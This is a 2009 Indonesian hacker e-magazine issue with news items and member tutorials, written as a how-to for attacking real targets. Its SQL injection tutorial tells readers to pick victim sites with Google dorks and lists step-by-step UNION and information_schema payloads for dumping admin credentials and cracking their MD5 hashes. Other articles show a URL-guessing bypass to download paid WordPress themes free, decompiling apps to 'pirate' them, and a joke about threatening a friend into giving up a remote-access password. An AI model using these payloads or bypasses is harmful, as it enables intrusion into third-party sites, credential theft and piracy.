Hacker eMagazine Vol.1_2

www.hackers-center.org

Virus Section – Hal 30

Guitar Pro 5.2 Demo – Hal 36

Decompiler VB – Hal 12

SQL Injection Basic – Hal 14

WooThemes Hack – Hal 20

XSS Attack – Hal 46

- 1- HC eMagazine – Spirit # 01

Hackers-Center © 2009 – HC eMagazine Vol. 01

HC eMagazine

HC eMagazine..?

HC eMagazine adalah majalah elektronik komputer, internet, hacking dan coding

berbahasa Indonesia yang dibuat oleh staff dan member HC dengan format PDF.

Latar Belakang HC eMagazine :

Makin banyaknya kebutuhan akan informasi dunia teknologi komputer dan internet

membuat HC menjadikan komunitas baru di dunia internet yang menyediakan bahan

referensi dalam dunia cyber khususnya hacking sehingga para pecinta internet tidak

tertinggal informasi.

Tujuan :

Share and Learning adalah moto HC dengan tujuan semua orang dapat berbagi ilmu

dan belajar dari ilmu yang didapat. Serta memberikan pencerahan terhadap dunia

Teknologi Informasi khususnya Hacking dan Security.

Misi :

Menyebarkan ilmu-ilmu komputer, internet dan hacking untuk tujuan Positif hanya

untuk pengetahuan dan tidak untuk disalahgunakan.

Hak Cipta :

Seluruh isi yang ada di HC eMagazine adalah sepenuhnya milik penulis, HC hanya

sebagai media berbagi ilmu dan HC Magazine ini dapat di download dengan GRATIS

dan boleh menyebarluaskan dengan bebas dengan tujuan Non-Profit.

Distribusi HC Magazine :

- HC Magazine Dapat di download secara resmi di www.hackers-center.org

- Website staff dan member HC

- Serta media-media pendukung yang bekerjasama dengan HC

Contact HC Magazine :

- Administrator ([email protected])

- ciebal ([email protected])



» Editorial

Hackers-Center Perjuangan

Forum Hackers Center atau selanjutnya disebut Forum HC adalah sebuah

sarana untuk berbagi dan belajar.

Forum ini berbentuk komunitas dan dibentuk oleh komunitas serta ditujukan

untuk semua kalangan yang ingin belajar dan berbagi utamanya dalam hal

komputer dan internet. Nama Hackers Center sendiri adalah usulan dari

komunitas yang pada awalnya bergabung untuk berbagi pengalaman dan

sharing mengenai dunia komputer dan sekitarnya.

Pada awalnya berdirinya forum ini adalah sebuah forum personal yang

dibangun oleh ANDRE aka NeckLord dan beberapa teman yang lainnya.

Forum awal bernama andresite.us yang dibangun sekitar tahun 2006. Saat itu

hanya beberapa orang dekat yang bergabung, dan belum aktif seperti

sekarang. Andresite berjalan kurang lebih 1 tahun. Kemudian ada masalah

dengan penyedia hostingnya sehingga andresite.us tutup.

ANDRE sebagai pencetus dan dengan beberapa rekan yang lainnya sepakat

untuk membentuk komunitas baru dan diberi nama Hackers Center.

Awalnya forum ini ada di sebuah penyedia layanan forum gratisan.

Alamatnya hackerscenter.informe.com dan sempat berjalan selama kurang

lebih 1 tahun juga hingga akhirnya mempunyai domain dan hosting sendiri.

Kru yang menggawangi HC Informe masih kurang lebih sama dengan

andresite.us dan ditambah beberapa moderator baru termasuk saya.

Pada awal 2007, team ADMIN berkoordinasi untuk mengupayakan domain

dan hosting sendiri buat kemajuan forum. Hingga akhirnya pada April 2007

dipilihlah sebuah domain atas hasil polling. Domain inilah yang sampe

sekaran dipergunakan. HC adalah milik komunitas HC sejak pertama kali

berdiri. HC dibangun dengan asas kebersamaan agar semua members dan

non members dapat saling berbagi dan belajar bersama tanpa kecuali baik

dari suku apapun, ras apapun, agama apapun, bangsa apapun dan

sebagainya.

Kami sebagai para Administrator, Moderator, Contributor dan penggiat

berbagai kegiatan hanya fasilitator untuk mengatur agar semua dapat

berjalan baik dan optimal untuk members dan semua masyarakat IT di

Indonesia.

Trims,

Andre S

Hackers Center Community

Administrator

� NeckLord

� UnderDOS

� Viper

� Nobita HC

Moderator

� Ramz

� ArminVanBuuren

� Equal

� Jackzard

� Kotaro

� Spiderman

� ciebal

� nicx

Contributor

� metropilix

� root

� agitama

� pass_word

� 4L13N

� general_nagabonar

HC eMagazine Writer

� ciebal

� pass_word

� Xyberbreaker

� metropolix

� ramz

� root

� Nobita HC

� eminem

� EiGhtTailz

� omicron9194

� Equal

Contact

� Kirim Artikel

[email protected]

� Kritik dan Saran

[email protected]

Download HC eMagazine

� www.hackers-center.org

� forum.hackers-center.org

� All Supported Us



/Dir � Hot News - Situs phpBB.com Under attacker – hal.4

� Hot News – Defacer kena Deface – hal.5

� Do You Know..? – Apa Adsense itu..? – hal.6

� Show My PC – Mengontrol PC dari jarak jauh – hal.7

� Nature Illusion Studio – Membuat image berjalan di desktop – hal.9

� Decompiler VB – Membajak Aplikasi yang dibuat dengan VB – hal.12

� SQL Injection Basic Tutorial – Konsep dasar SQL Injection – hal.14

� USB WiFi TP-Link – Menggunakan Antena Eksternal – hal.18

� WooThemes Hack – Mendapatkan theme WP premium dari WooThemes – hal.20

� Web Hosting – Penggenalan Sub Domain, Parked Domain dan Add-on Domain – hal.23

� SQL Injection by Xyberbreaker – Membobol situs perguruan tinggi – hal.25

� IP Command – Mengenal IP Command pada CMD – hal.28

� Virus Section – Knowledge, History, Type of Virus, etc – hal.30

� Guitar Pro 5.2 Demo Version – Cracking Software Guitar Pro – hal.36

� Advanced SQL Injection – Test On Windows XP – hal.42

� XSS Attack – Deface Web Tanpa Merusak – hal.46

� Phising Attack – Pengenalan dan Pencegahan – hal.50

� Bedah Web With Schemafuzz – SQL Injection Dengan Metode Schemafuzz – hal.53

� Instalasi Ubuntu 8.10 – Migrasi dari Windows ke Linux – hal.60

� HC eMagazine Writer – Ketentuan Menjadi Penulis HC eMagazine

� Lampiran – Serba-Serbi HC eMagazine



» Hot News

Berita Seputar Teknologi Informasi

Present By : Redaksi HC eMagazine

Situs phpBB.com Under Attacker

CALIFORNIA - Situs milik salah satu penyedia layanan open

source bulletin boards terbesar di dunia, phpBB, berhasil

diterobos hacker. Akibatnya, sebanyak 400.000 username,

alamat e-mail, dan password bocor.

Seorang peretas berhasil memperoleh akses ke database

forum dan mailing list dengan memanfaatkan lubang di

peranti lunak newsletter PHPlist. Demikian seperti dikutip dari

Softpedia, Sabtu (7/1/2009).

PHP Bulletin Board, yang lebih dikenal dengan phpBB, adalah salah satu aplikasi yang paling banyak

dipakai untuk mengelola forum online. Software ini berplatform open source dan dirilis di bawah GNU

General Public License, yang sepenuhnya gratis. Layanan ini dibuat dalam PHP dan mendukung

delapan backends SQL yang berbeda.

Hingga tulisan ini dibuat, situs phpBB.com masih offline. Begitu juga dengan situs-situs lain yang terkait

juga belum aktif. Sebuah pengumuman dibuat saat situs tersebut dikunjungi:

"We are sorry to report that we have been attacked through a vulnerability in an outdated PHPList

installation. phpBB.com and related sites will remain unavailable while we work to recover. No

vulnerabilities have been found in the phpBB software itself."

Situs pusatnya saja bisa di susupi hacker, apalagi ribuan situs yang menggunakan phpBB di dunia. Jika

tidak cepat-cepat di update maka ini merupakan ancaman yang cukup serius bagi pengguna phpBB.

Sumber : techno.okezone.com



» Hot News Berita Seputar Teknologi Informasi


Defacer kena Deface

Entah apa yang sebenarnya terjadi dengan situs gorontalodefacer.org ini, yang jelas redaksi diberitahu

oleh seseorang bahwa situs defacer yang cukup terkenal ini terkena deface. Dari sumber yang ada

terjadi simpang siur, tentang siapa yang mendeface situs ini, entah itu dari orang dalam, orang

malaysia, dll. Ramai sekali didiskusikan di salahsatu forum hacker indonesia.

Sampai administrator (EA Ngel, nick di echo. Red) ikut bicara soal ini katanya “Cuma meluruskan aja.

Ak EA Ngel salah satu Admin GorontaloDefacer tdk keberatan site kita kena deface, karena dgn ini

kami [GDC] bisa mengetahui kelemahan [bug / hole] site kami dan kami sangat berterima kasih

pada Xhimes. Soal Xhimes adalah sahabat dari salah satu admin GDC, itu emank benar.” Dikutip

dari echo. Tapi sampai saat tulisan ini ditulis (06/03/09) situs itu masih off, katanya sih masih terjadi

masalah sehingga belum bisa ON. Ini menandakan begitu besarnya resiko yang terjadi di dunia maya.

Tidak ada yang aman di dunia maya. (-Red)



» Do You Know..? Sebaiknya Anda Tau..


Apa Adsense itu..?

Singkatnya Adsense adalah layanan iklan milik Goggle. Google

Adsense menyediakan bermacam-macam iklan yang nantinya

bisa di pasang di website kita sesuai kategori iklan yang bisa

kita sesuaikan dengan tema blog kita.

Untuk memasang iklannya, kita tidak perlu membuat sendiri

dan menyediakan server khusus. Anda cukup menyediakan

space atau ruang kosong untuk iklan dan menyispkan kode javascript yang diberikan Google.

Tentunya space iklan yang ada di blog kita harus strategis agar para pengunjung dapat melihat

iklannya dengan mudah dan nyaman.

Untuk Apa Iklan itu dipasang di blog kita..?

Adsense memberikan kesempatan kepada anda untuk mendapatkan penghasilan tambahan dengan

memasang iklan yang disediakan oleh google. Anda akan mendapatkan bayaran untuk setiap iklan

yang di klik oleh pembaca situs. Apa hanya dengan meng-klik saja?

Ya, cukup dengan meng-klik saja, otomatis anda akan mendapatkan sejumlah uang yang nilai

bagiannya diperhitungakn dari beberapa bid yang telah ditentukan oleh si pemasang iklan

(advertiser). Meskipun ada factor lain yang mempengaruhinya, secara umum bagian yang diperoleh

publisher adalah 20% dari niali bid. Berarti kita bisa meng-klik iklan kita sendiri dengan terus menerus

agar cepat mendapatkan uang?

Ya silahkan saja jika anda berani dan tidak ketahuan dengan pihak pengelola iklan, karena secara

peraturan itu merupakan tindakan yang tidak diperbolehkan dan sanksi untuk itu adalah dari mulai

penghasilah anda di hapus sampai akun anda yang di baned.

Bagaimana Pembayarannya..?

Pembayaran akan dilakukan 30 hari setelah total pendapatan anda dalam satu bulan mencapai

minimal $100. Kalau saya dalam satu bulan tidak mendapatkan $100 bagaimana..?

Jangan khawatir, jika dalah satu bulan pendapatan anda tidak mencapat $100 karena itu dihitung

kumulatif. Jadi jika bulan januari anda mendapatkan $30 dan februari $80, maka cek akan dikirimkan

pada akhir bulan maret.

Untuk wilayah Indonesia, pembayaran akan dikirim dalam bentuk cek dan anda dapat memilih untuk

menggunakan jasa pos ataupun DHL (Wxpress Delivery) dalam proses pengiriman cek tersebut. Jika

menggunakan jasa pos, waktu pengiriman biasanya paling cepat adalah 20-25 hari. Sedangkan jasa

DHL cek akan anda terima dalam waktu 2-3 hari kerja. Tapi ada biaya tambahan unuk jasa ini sebesar

$24. Biaya ini otomatis akan dipotong dari pendapatan anda.

Referensi : http://groups.google.co.id/group/give-up/



Show My PC Mengontrol PC dari Jarak Jauh

Writer : ciebal ([email protected])

Kali ini gw coba sharing sedikit pengetahuan

gw yang gw dapatkan ketika chat dengan salah

satu moderator HC yang anak SMK Telkom,

hehehe.. Dya yang kasih tau gw tentang hal ini

dan gw coba untuk menulisnya. (Sori ya Ramz,

bisnya lo ngontrol PC gw gak bilang-bilang) ☺

OK gak perlu basa-basi lagi, ikuti caranya

sebagai berikut :

1. Silahkan download App-nya di

http://www.showmypc.com ukuran file

tidak lebih dari 2MB. Lalu jalan kan App itu

di computer lo (akan terlihat seperti ini)

2. Lalu ajak temen lo menjalankan App itu juga

sehingga masing-masing computer telah

terpasang App yang sama. (Ok gw anggap

App dah terpasang yah)

3. Suruh temen lo untuk meng-generate

Passwordnya dengan cara meng-klik tombol

“Show My PC Now” maka secara otomatis

App ini meng-generate Password yang bisa

lo gunakan untuk mengontrol PC temen lo

itu. (Lihat gambar)

4. Jika temen lo sudah sukses menggenerate-

nya maka suruh temen lo untuk

mengirimkan passwornya ke lo. (Klo gak

mau paksa aja, klo gak ancem aja klo lo

bakal rusakin system computernya klo gak

kasih passwornya) hahaha..

5. Setelah lo dapatkan passwordnya sekarang

giiliran lo untuk bekerja! Sekarang klik

tombol “View Remote PC” lalu show my pc

akan meminta password, masukan

password yang temen lo kirim itu.



6. Tunggu deh sampai proses koneksi selesai,

gak akan lama kok kurang dari 1 menit. Jika

koneksi failed ulangi lagi sampai berhasil.

7. Sekarang terserah lo! Mau kamu apakan PC

temen lo itu. ☺

Gw rasa udah cukup jelas, jika mendapatkan

kesulitan silahkan hubungi saya atau diskusikan

di forum. Terimakasih mohon maaf klo tulisan

ini dianggap kurang.

Wassalamualaikum… ☺

Referensi : Hasil pengalaman dan Chat dengan RamzHC

/Nick : ciebal

/Location : Banten - Bandung

/Email : [email protected] or [email protected]

/Web: www.my-ciebal.co.cc



Nature Illusion Studio Membuat Image Berjalan di Desktop

Writer : pass_word ([email protected])

Artikel ini awalnya kebosanan gw karena desktop hanya tampilan gambar mati 2D, hari gini masih 2D apa kata

dunia. Langsung aja mulai, Tahu kan ekstensi image yang dapat bergerak yaitu *.gif , nah kali ini gw ingin

mencoba berbagi ilmu membuat image *.gif dengan mudah, cepat, dan pasti dengan hasil yang bagus. Proses

pembuatan nya menggunakan software nature illusion studio, software ini dapat menghasilankan screenserver

dan aplikasi, movie, dan gif. Yang gw bahas disini hanya yang gif.

Yang di perlukan:

- Image (*.jpg, *.bmp, atau *.gif),

- Software nature illusion studio

Download:

http://www.4shared.com/file/84705473/8dca12f8/NatureIllusionStudioProfessionalv180017.html (4952KB)

Mirror: http://rapidshare.com/files/194595746/Nature.Illusion.Studio.Professional.v1.80.0.17.rar.html

(5071KB)

- windows XP (belom dicoba bila di OS lain),

- segelas kopi susu yang ditemani oleh 1 bungkus rokok (ajibb).

ok pendahuluan nya selesai,

TAHAP – TAHAP PEMBUATAN :

1. download nature illusion studio -> install -> masukkan serial number nya,

2. jalakan nature illusion studio -> new -> load image (pilih image lo),

tampilan setelah tahap ke 2



3. Berikutnya gw akan memberi effect pada image, disini gw memakai effect yang membuat api berkobar, agar

terasa hangat ( pura-pura nya), caranya:

Lihat tanda panah effect klik preset -> load -> fire/fog/smoke ->goreskan pada api di image,

Untuk bayangannya, gw memakai effect watter ripple, agar terlihat berada di air.

4. Sekarang melihat hasil nya, klik (preview),

5. Ok sekarang tinggal menjadikan gambar menjadi gif,

Klik build gif -> custom -> setting size = 1024 x 721 dan water speed = max -> create -> save,

effect

membuat *.gif



6. Jadikan image gif tersebut menjadi desktop lo, ga terlalu terlihat kl disini hasil nya, dicoba aja dan

dikembangkan.

OK, sekian dulu semoga dengan ini membuat lo gak jenuh lagi dan selalu berkreasi..

Wassalam…

Created by: pass_word a.k.a bagong

Email : [email protected]

YM : bagong_ipb1

THANX TO : ALLAH SWT, WARNET VINET CREW, ALL STAFF n MEMBER HACKERS-CENTER, EMINEM

(account shutterstock nya makasih).



Decompiler VB Membajak Aplikasi yang dibuat menggunakan VB


Alhamdulillah, pada kesempatan kali ini gw

coba berbagi sedikit pengetahuan gw lagi

tentang computer dan tidak lain dengan tujuan

sharing bukan berniat menggurui.

Mungkin temen-temen dah pada tau apa arti

decompiler, singkatnya decompiler kebalikan

dari compiler yang artinya kebalikan dari

menggabungkan dan pasti kalo dah baca

tulisan ini pasti ngerti deh.. So baca terus yah..

☺

Pertama yang mesti lo siapin adalah (seperti

biasa) Software decompiler yang cukup

terkenal dan cukup mudah di gunakan yaitu

VBReformer (lo bisa cari decompiler lain yang

menurut lo mudah, tapi sekarng yang gw bahas

adalah VBReformer).

Download softwarenya di

http://www.decompiler-vb.net/ dan

sebelumnya lo mesti daftar dan Sign In dulu

untuk mendownloadnya (Jangan lupa pilih

yang Free Edition) KLo punya duit sih beli yang

premium. :P

OK, gw anggep lo dah download dan sekarang

Install software seperti biasa. Setelah install

maka akan terlihat tampilan utama yang

simpel seperti ini :

Ok, sebagai contoh gw ambil App yang dibuat

dengan VB oleh s’to jasakom.

Untuk mencari filenya, klik File >> Open >>

Pilih file .exe yang telah di compiler dengan

VB. Sebagai contoh gw pilih App Seni Internet

Hacking yang dibuat oleh S’to Jasakom.

(setelah pilih file aka nada warning, tapi jangan

khawatir klik continue aja)



Screenshot di atas adalah file App yang

digunakan untuk menonton Video Seni

Internet Hacking yang dibuat oleh S’to.

Q : Bagaimana untuk mengubah file itu..?

A : Gampang kok, sekarang lo tinggal Klik File

>> Save Project As >> pilih tempat dimana lo

mau nyimpen project itu.

Sekarang lo dah punya project VB yang bisa lo

edit di Software Pemrograman VB 6 atau

bahkan VB 2008. (rada rumit di VB 2008) :P

Pasti dah gak asing kan App ini..?

Sekarang lo bisa edit semau lo dan dengan

desain lo sendiri. ☺

Q : Tapi kok gw coba decompiler AVG,

Transtool, Photoshop, dll gak bisa..?

A : Wedew, gak semua file .exe bisa jadi lo

coba-coba aja semua file berekstensi .exe ☺

OK, gw rasa dah cukup jelas sampai sini apabila

masih ada kesulitan silahkan hubungi gw selagi

gw bisa bantu (tapi klo gak bisa bantu maaf ya,

gw juga baru belajar). Semoga dengan ini lo

bisa mendapatkan inspirasi untuk membuat

suatu program dengan VB, tapi inget kita disini

bukan untuk menjadi Plagiator so jadikan

tulisan ini sebagai ilmu pengatahuan belaka.

(sok alim deh gw) xixixixi..

/Nick : ciebal






SQL Injection Basic Tutorial Konsep Dasar SQL Injection

Writer : Metropolix ([email protected])

Nah.. sebelumnya kita cari tahu dulu nih pengertian sql injection… ok!

Searching… searching di paman Google.., nah.. dapat deh

rangkumannya. He..he..he..

Yup, SQL injection adalah sebuah aksi hacking yang sering dilakukan di

aplikasi client dengan cara memodifikasi perintah SQL yang ada di

memori aplikasi clien dan juga merupakan teknik mengeksploitasi web

aplikasi yang didalamnya menggunakan database untuk penyimpanan data.Wew..(lengkap ya bro

andrea… Copas lo yah?? Tau ajah,,wakakakakka.)

Macam-macam Perintah SQL injection:

Karakter: ‘, -

comments: /*,--

information_schema untuk versi: mysql versi 5.x , tidak dukung untuk mysql versi 4.x

(menurut gw)

allinurl: news.php?newsid=

inurl: /berita.php?id= (atau dengan dork yg lain juga bisa.. tergantung kreatifitas kamu.)

1. Tahap Pertama

Cari korban di paman Google..

Anggap saja kali ini target kita [website]/berita.php?id=20

Tambahkan karakter ' pada akhir url atau bisa juga dengan menambahkan karakter "-" untuk melihat

apakah ada pesan error.

contoh:

[website] /berita.php?id=20' atau

[website] /berita.php?id=-20

Apabila kira-kira ada pesan seperti ini “ You have an error in your SQL syntax”. Berarti terdapat bugs

dalam web nya.



2. Tahap Kedua

Sekarang kita mulai mencari dan menghitung jumlah table yang ada di dalam Databasenya.

Dengan melakukan Perintah: order by

Contoh:

[website] /berita.php?id=-20+order+by+1-- atau

[website] /berita.php?id=-20+order+by+1/*

Kita coba satu persatu untuk menebaknya..

misal:

[website] /berita.php?id=-20+order+by+1- -




Lakukan terus sampai hilang pesan erornya..( kalau gak hilang-hilang pesan erornya gmn bro andrea??.. Artinya

Comp loe yg eror..wakakakka)

Contoh: [website] /berita.php?id=- 20+order+by+4—

Nah.. pesan eror nya hilang di angka itu.Berarti yang kita catat adalah sampai angka 4.

Menjadi [website] /berita.php?id=-20+order+by+4—

3. Tahap Ketiga

Sekarang kita akan mengeluarkan angkanya dengan melakukan perintah:

Contoh: [website] /berita.php?id=- 20+order+by+1,2,3,4—

Cilukba…. Keluarlah angkanya.. anggap saja kali ini angka yg keluar adalah angka 3 dan angka di bawahnya

angka 4.

Yup,dibagian itulah web tersebut bisa kita cari username admin dan password sang admin.Liat angka pertama..

angka 3.,

Untuk Mengetahui Versi SQL nya,gunakan perintah version() atau @@version,dan masukkan di angka yg keluar

tadi.

Contoh:

[website] /berita.php?id=-20+union+all+select+1,2,version(),4—atau

[website] /berita.php?id=-20+union+all+select+1,2,3,@@version,4—

Liat versi yg digunakan admin,apabila versi 4 kita lupakan saja dan cari target yang memakai versi 5.

Kalau versi 5 berarti kita beruntung tak perlu menebak table n column seperti ver 4

karena di ver 5 ini bisa menggunakan perintah From+Information_schema.



4. Tahap Keempat

Untuk menampilkan table yang ada pada website target kita dengan melakukan perintah:

Group_concat(table_name) >>> dimasukan pada angka yg keluar tadi

+from+information_schema.tables-- >>> dimasukan

setelah angka terakhir

Contoh:

[website] /berita.php?id=-

20+union+all+select+1,2,group_concat(table_name),4+from+information_schema.tables—

Akan keluar isi-isi table databasenya.

5. Tahap Kelima

Zzzzz…ini tahap yang menyebalkan menurut gw,karena disini dibutuhkan kesabaran yg tinggi. (ceilehh..

bahasanya.. wakakaka)

Ok,,kita cari tahu table yang mengandung username admin dan passwordnya.

Kita cek satu persatu per satu isi table nya,, karna table-table database itu masih

bentuk ascii kan ga bisa di baca...maka harus di convert ke hex dulu.cari di google website buat

mengkonversinya.

Nih ada contoh tools nya:

• http://andrea-metropolix.com/tools/ascii.html

• http://www.dolcevie.com/js/converter.html

• http://www.industrialtrainer.com/Unicode.shtm

Contoh kata yang ingin di konversi yaitu “ admin “ dan bentuk hex nya ada 61646D696E.

Kita lanjut cari data table yang mengandung username admin sama passwordnya,,okeh!!

group_concat(column_name) >> dimasukkan pada angka yang keluar tadi.

+from+information_schema.columns+where+table_name=0x[hasil dari +convert ascii-hex]-- >>

ditambahkan pada angka terakhir.

Contoh:

[website] /berita.php?id=-

20+union+all+select+1,2,(group_concat(column_name),4+from+information_schema.columns+where

+table_name=0x61646D696E—

Dari situ kita akan dapat isi-isi tablenya.. missal isi tablenya: user,username,password.



6. Tahap Keenam

Tahap terakhir ini kita akan mencoba mengeluarkan isi data table tadi,masukkan kedalam “ column_name “

dengan perintah:

group_concat(0x3a,username,0x3a,password) >>>> dimasukkan pada angka yg keluar tadi.

+from+admin-- >>>> dimasukkan pada angka terakhir.

Dan Akhirnya… Cilukbaaa!! keluarlah username admin dan passwordnya..

Contoh: admin: fdfbe5666d7cd46517daeef2ba28fbb2.

Username: admin

Password: fdfbe5666d7cd46517daeef2ba28fbb2

Tinggal cari halaman login adminnya dan selesai. :D

Hmmm….. kok gak bisa login nya ndre??

Itu artinya passwordnya di enscrypt pakek MD5,cari aja crack online nya di google, atau di mIrc banyak kok Bot

buat nge Crack MD5.

Happy hunting ….!!

OK yah semua.. sampai sini dulu tutorial saya mengenai dasar SQL injection. Sebenarnya masih banyak lagi cara

yang bisa di gunakan,tergantung kreatifitas kamu.

Mohon maaf jika ada kekurangan dalam tutorial ini.,saya sendiri masih sangatlah newbie dan masih butuh

bimbingan.

~ Salam hangat metropolix

Spesial Thank’s Hackers-Center , Balikita ,Yogyafree , Gorontalo Defacer

T UnderDos T Coco_n4kal T tukulesto Tgblack T bl4ck_3n91n3 TOkacybernet T

crazydavinci T

T Ramz TAgitama Tmamet-tossa T tucker Tindomie T

===============================================================

===============================================================



USB WiFi TP-Link Menggunakan Antena External

Writer : root ([email protected])

Bagi yang memakai USB type ini kemungkinan agak kecewa bila

dibandingkan dengan merek lain. Nah disini kita coba untuk

mengoptimalkan perangkat ini dengan cara menambahkan

antena kecil 1/4Lambda di luar chassingnya.

Bahan yang digunakan untuk tambahan antena harus

memenuhi untuk standart frequency, yang artinya ga

sembarangan tembaga / kabel bisa dipergunakan. Di percobaan

kali ini kita pakai bekas antena HELICAL / bawaan dari radio

merek EDIMAX, JAHT, MINITAR, LINKSYS, dll yang biasanya tidak dipergunakan lagi karena radio

tersebut sudah dipasang di outdoor memakai antena external GRID, OMNI, ataupun SEKTORAL.

Antena HELICAL tersebut kita pergunakan kabelnya aja yang ada di dalam, jadi kita terpaksa bongkar

antenanya sehingga mendapatkan kabel COAXIAL beserta pipa GROUND, dalam proses ini perlu

ketelitian dan penuh hati-hati supaya kabel COAXIALnya tidak rusak atau putus.

Setelah mendapatkan apa yang kita cari maka barulah kita bongkar chassing USB TP-Link dengan

dicutter di bagian pinggir. Di dalam rangkaian akan kelihatan pada bagian ujung ada semacam antena

panel berukuran mini yang terbuat dari jalur tembaga di PCB.

Potong jalur antena tersebut dengan cutter yang mengarah pada capasitor, hati-hati juga dalam

melakukan hal ini, kalau tidak kelihatan wajib memakai kaca mata atau kaca pembesar. Sewaktu

memotong jangan terlalu dalam, hal ini dimungkinkan agar di dalam PCB ada tidak jalur lain yang ikut

terpotong.

Lubangi samping chassing untuk memasukkan kabel COAXIAL yang kita dapat tadi, kelupas bagian

pangkal kabel kira-kira 5mm, masukkan kedalam lubang tadi dan solder bagian tengan kabel ke

capasitor paling ujung. Untuk bagian serabut solder juga pada ground jalur PCB.

Tutup kembali chassingnya dan tetesi dengan lem Alteco sedikit saja. Bengkokkan antena external

tadi sesuka yang anda mau. Test untuk scanning sinyal dan bedakan perubahan yang terjadi dengan

sebelum anda kasih antena external ini.

Lebih baik untuk chipset dikasih heat sink sekalian, karena biasanya chipset USB WiFi cepat panas

yang mengakibatkan umurnya tidak bertahan lama.



Setelah hasilnya memuaskan barulah project selanjutnya kita pasang USB WiFi tersebut tepat di

depan reflektor parabola, entah mau pakai WAJAN, ASTRO Disc, INDOVISION Disc, bahkan PARABOLA

besar 9feet sekalipun.

root@HC A.K.A chepoek

[email protected]



WooThemes Hack Mendapatkan Themes WP Premium dari WooThemes


Hi, All..

Moga gak bosen yah dengan gw, sekarang gw mau coba berbagi sedikit trik bagaimana mendapatkan themes

premium Wordpress milik Woothemes tanpa membelinya. Hari gini themes aja masih beli ? :P

OK Langsung menuju TKP, buka www.woothemes.com nanti akan muncul halaman seperti ini :

Sekarang lo pilih themes yang lo inginin, (yang ada tombol Buy)

Gw anggap lo milih themes dengan nama Crushy, OK? Sekarang kita mulai.. ☺

Coba lo arahkan mouse lo kea rah tombol “Buy this thems” lalu lihat di status bar >>



Perhatikan URL-nya yaitu : http://www.woothemes.com/my-downloads/xxxxxxxxxxx yang gw kasih

tanda xxxxxxxx itu adalah URL target kita. Sekarang lo mau download theme bernama Crushy lalu

masukan URL menjadi www.woothemes.com/my-downloads/cushy.zip



Lalu apa yang terjadi..?

Inilah hasilnya. Themes Premium dari Woothemes dengan mudah kita download tanpa bayar dan

tanpa mengahabiskan waktu lama. ☺

Intinya adalah pada URL www.woothemes.com/my-downloads kita hanya menambahakan nama dari

themes tersebut, kalau tadi contohnya adalah theme cushy maka tambahkan dibelakangnya

cushy.zip.

Simpel kan..?

Kalau mau liat themes dari WooThemes, bisa liat blog gw (www.my-ciebal.co.cc) itu yang gw pake

theme premium dari WooThemes .Sekarang lo bisa download tuh theme sepuasnya.. hehehe..

Sampai disini dulu deh, dah ngabisin berapa halaman neh Cuma buat ini aja. Makasih…

/Nick : ciebal






Web Hosting Ng’gak ngerti apa itu Sub Domain, Parked Domain, n’ Add-on Domain?

Writer : Nobita HC ([email protected])

Sebelum memulai artikel ini. Gue mau ngucapin dulu terima kasih karena telah

diberikan kepercayaan untuk membuat sebuah artikel yang mungkin nantinya

dapat berguna buat teman2 semuanya. N gue juga minta maaf kalau

hanya bisa membuat artikel yang sangat sederhana seperti ini.

Ok, jangan basa basi lagi (entar malah gak enak ☺). Langsung aja masuk pada pokok permasalahan. N

ada satu lagi yang gue mau tekankan... Artikel ini khusus yang belum pada tau aje ye...!!! kalau yang

sudah tahu mohon koreksinya.

Sub Domain

Untuk istilah yang satu ini sangat sederhana. Gue langsung contohkan, loe pasti sangat kenal n ingat

dengan alamat situs hackers-center.org ☺. Nah alamat yang diberi warna merah (hackers-center) itu

disebut Domain sedangkan .org itu adalah TLD (Top Level Domain) yaitu akhiran dari suatu domain

yang menunjukkan status organisasi.

Eh, tapi tunggu dulu, kan yang lagi dibahas ini sub domain, kok malah bahas domain... ☺. Loe ng’gak

perlu khawatir broo... soalnya bahasan kita ini saling berhubungan. Kalau loe sudah paham dengan

domain maka untuk mengartikan sub domain sangatlah mudah. Sebagai contoh gue mau membuat

sebuah direktori yang akan mengakses ke hackers-center.org/forum nah untuk mempermudah akses

gue akan membuat sebuah sub domain forum.hackers-center.org, nah forum itu adalah sub domain

dari hackers-center.org. Contoh lain yang sederhana adalah buku. Dalam buku pasti terdiri dari Bab-

bab nah dalam Bab tersebut pasti terdapat sub bab, n sama kayak domain, forum.hackers-center.org

adalah contoh dari sub domain tersebut.

Untuk membuat sub domain ini biasanya tergantung hosting dan paket yang Loe pilih. Ada paket yang

sudah tersediah bahkan ada pula yang harus memilih paket yang lebih mahal.

Parked Domain

Nah berbedah dengan sub domain. Parked domain ini dapat diartikan menggabungkan beberapa

alamat domain untuk mengakses satu data hosting yang sama. Atau kalau digambarkan diforum yaitu

mempunyai banyak nickname tapi orangnya ya satu itu doank... ☺.

Kayaknya penjelasan gue diatas belum begitu jelas nih.... Ok gue akan gambarkan seperti ini. Loe

mempunyai dua nama domain yaitu situsgue.com dan situsgue2.com. Nah kedua domain ini akan

mengakses data web yang sama. Jadi gini, kalau loe ketik situsgue.com maka akan tampil halaman



situsnya dan kalau loe ketik situsgue2.com juga akan tampil situs yang sama dengan situsgue.com.

Karena kedua domain tersebut mengakses satu data situs.

Sama halnya dengan sub domain. Terkadang untuk mendapatkan fasilitas ini Loe harus membayar

lebih mahal supaya mendapatkan fasilitas parked domain.

Add-on Domain

Pembahasan yang terakhir adalah Add-on Domain. Dimana Add-on Domain ini berbeda dengan

Parked Domain yang telah dibahas sebelumnya.

Perbedaannya adalah kalau Add-on Domain yaitu Loe benar-benar mempunyai dua buah atau lebih

situs dengan dua buah atau lebih alamat domain. Namun masih dalam satu paket hosting yang sama.

Contoh loe mempunyai situs utama dengan alamat warunggue.com. Kemudian loe beli lagi satu

domain namun tidak dengan paket hostingnya. Jadi loe mau meletakkan domain ke dua tadi ke dalam

server hosting situs pertama.

Untuk itu loe dapat menggunakan fasilitas Add-on Domain, dan loe dapat meletakkan isi situs yang

baru ke dalam direktori warunggue.com/situsbaru. Dan pada saat orang mengakses alamat domain

loe yang baru maka yang akan tampil adalah data dari direktori warunggue.com/situsbaru. Namun

pada kotak addressbar browser yang tampil tetap alamat domain yang baru bukan direktori dari

warunggue.com/situsbaru.

Kemudian sama halnya dengan sub domain dan parked domain. Terkadang untuk mendapatkan

fasilitas ini Loe harus membayar lebih mahal supaya mendapatkan fasilitas Add-on Domain.

Ok, gue rasa untuk artikel ini gue cukupin aja dulu..!!! Maaf kalau artikelnya sederhana n kurang jelas.

Serta gue juga minta maaf kepada semua teman-teman karena gue jarang online. Maklum banyak

faktor n penyebab yang tak dapat gue jelaskan satu-persatu. Namun jika teman-teman ada

pertanyaan dapat bertanya langsung ke email gue. (Nobita adalah salahsatu admin HC, Red)

